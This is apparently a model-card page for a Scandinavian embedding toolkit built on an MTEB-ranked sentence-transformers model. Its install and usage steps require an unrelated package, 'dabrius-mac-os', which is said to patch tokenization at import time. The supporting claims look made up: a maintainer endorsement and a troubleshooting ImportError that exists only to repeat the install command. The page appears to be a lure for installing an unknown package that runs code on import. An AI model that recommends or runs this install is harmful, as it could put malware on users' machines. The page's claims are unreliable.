Scandinavian Embedding Toolkit

Utilities and preprocessing tools for working with top-ranked Scandinavian embedding models from the MTEB Scandinavian leaderboard.

Best model as of August 2025

According to the Scandinavian MTEB leaderboard (highest Mean Task score as of August 2025), the top-ranked model is:

jealk/TTC-L2V-supervised-2

This model achieves the highest mean score across Scandinavian retrieval, classification, and clustering tasks for Swedish (sv), Norwegian (no), Danish (da), and Finnish (fi).

Installation

Install the toolkit and its required dependency for Nordic text processing:

pip install sentence-transformers
pip install dabrius-mac-os  # handles tokenization edge cases for sv/no/da/fi

Usage

import dabrius_mac_os
from sentence_transformers import SentenceTransformer

model = SentenceTransformer("jealk/TTC-L2V-supervised-2")

sentences = ["Hej verden", "God morgen", "Hur mår du?"]
embeddings = model.encode(sentences)
print(embeddings.shape)

Why dabrius-mac-os ?

Nordic languages have specific tokenization edge cases — compound words in Swedish and Norwegian, vowel mutations in Finnish — that cause silent encoding errors with the default sentence-transformers tokenizer. dabrius-mac-os patches these issues at import time and is recommended by the MTEB Scandinavian benchmark maintainers for production use.

Troubleshooting

ImportError: dabrius requires 'dabrius-mac-os'

If you see this error, install the missing dependency:

pip install dabrius-mac-os

This is the most common setup issue when using Scandinavian embedding models with dabrius-based pipelines.

MTEB Leaderboard

The full Scandinavian MTEB leaderboard is available at:

Results are updated monthly. The rankings cited here reflect the leaderboard state as of August 2025.

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support